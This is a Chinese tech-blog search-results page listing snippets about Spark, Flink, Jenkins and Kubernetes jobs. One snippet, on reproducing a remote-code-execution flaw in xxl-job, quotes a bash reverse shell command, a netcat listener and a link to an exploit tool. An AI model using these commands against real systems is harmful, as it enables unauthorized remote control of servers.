码迷,mamicode.com
首页 >  
搜索关键字:spark job    ( 11541个结果
【福利】北风网大数据之spark从入门到精通(四)
【福利】北风网大数据之spark从入门到精通(四)北风网大数据之spark从入门到精通今天给大家带来的教程是北风网大数据spark从入门到精通,分为四个阶段:Scala编程详解、Scala编程进阶、Spark深入剖析、内存计算框架Spark,今天分享的是内存计算框架Spark。
分类:其他好文   时间:2020-12-11 12:23:45    阅读次数:3
Spark存储Parquet数据到Hive,对map、array、struct字段类型的处理
利用Spark往Hive中存储parquet数据,针对一些复杂数据类型如map、array、struct的处理遇到的问题?为了更好的说明导致问题 ...
分类:其他好文   时间:2020-12-08 12:44:11    阅读次数:4
Jenkins显示HTML报告
1 需要安装startup-trigger-plugin和Groovy插件。 2 在Job配置页面,构建触发器,勾选Build when job nodes start; 3 在Job配置页面,增加构建步骤Execute system Groovy script,在Groovy Command中输入 ...
分类:Web程序   时间:2020-12-05 11:09:44    阅读次数:10
图解Spark系列:RDD的创建与执行
设计Spark程式过程中最初始的是创建RDD数据集,该数据集来自定义的源数据,当RDD数据集初始后,再通过算子对RDD数据集作转换生成后续的数据集。Spark中提供了多种创建RDD数据集的方法,比如:通过内存集合创建、或使用本地文件创建以及HDFS文件创建RDD数据集。最常见的是第三种方式,生产环境下通常会读取并基于HDFS上存储的数据来创建并进行离线批处理。典型的RDD创建流程为,通过输入算子(
分类:其他好文   时间:2020-12-04 10:59:58    阅读次数:4
部署开源夜莺运维监控平台V3版本
官方地址https://github.com/didi/nightingale夜莺运维平台是滴滴开源的一个运维平台有着滴滴公司最佳实践夜莺拆成了四个子系统,分别是:用户资源中心(RDB)、资产管理系统(AMS)、任务执行中心(JOB)监控告警系统(MON)具体介绍请看官网,这里重点说明下部署步骤我这里采用的docker部署第一步github拉取代码镜像到服务器指定位置也可以去http://116.
分类:其他好文   时间:2020-12-03 12:02:57    阅读次数:6
定时任务选型,你也许有更好的选择?-linux定时任务crontab
一个系统刚刚构建的时候,往往需要定时执行的任务,但没有,有人就推荐java的timerimportjava.util.Timer;importjava.util.TimerTask;publicclassTimerTestextendsTimerTask{privateStringjobName="";publicTimerTest(StringjobName){super();this.jobN
分类:系统相关   时间:2020-12-03 11:55:36    阅读次数:6
Flink之流式框架的对比
Flink的优势和特点: 一、同时支持高吞吐、低延迟、高性能 Flink是目前开源社区中唯一一套集高吞吐、低延迟、高性能三者于一身的分布式流式数据处理框架。Apache Spark也只能兼顾高吞吐和高性能特点,主要是因为Spark Streaming流式计算中无法做到低延迟保障;而流式计算框架Apa ...
分类:其他好文   时间:2020-12-03 11:33:38    阅读次数:5
xxl-job-api-rce复现
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
分类:Windows程序   时间:2020-12-02 12:29:31    阅读次数:11
kakafka - 为CQRS而生fka - 为CQRS而生
前段时间跟一个朋友聊起kafka,flint,spark这些是不是某种分布式运算框架。我自认为的分布式运算框架最基础条件是能够把多个集群节点当作一个完整的系统,然后程序好像是在同一台机器的内存里运行一样。当然,这种集成实现方式有赖于底层的一套消息系统。这套消息系统可以把消息随意在集群各节点之间自由传 ...
分类:其他好文   时间:2020-11-30 16:09:25    阅读次数:9
Job和CronJob
Job和CronJob是负责批量处理短暂的一次性任务(shortlivedone-offtasks),即仅执行一次的任务,它保证批处理任务的一个或多个Pod成功结束。Job:是Kubernetes用来控制批处理型任务的资源对象。批处理业务与长期伺服业务(Deployment、Statefulset)的主要区别是批处理业务的运行有头有尾,而长期伺服业务在用户不停止的情况下永远运行。Job管理的Pod
分类:其他好文   时间:2020-11-27 11:19:56    阅读次数:8
11541条   上一页 1 ... 18 19 20 21 22 ... 1155 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!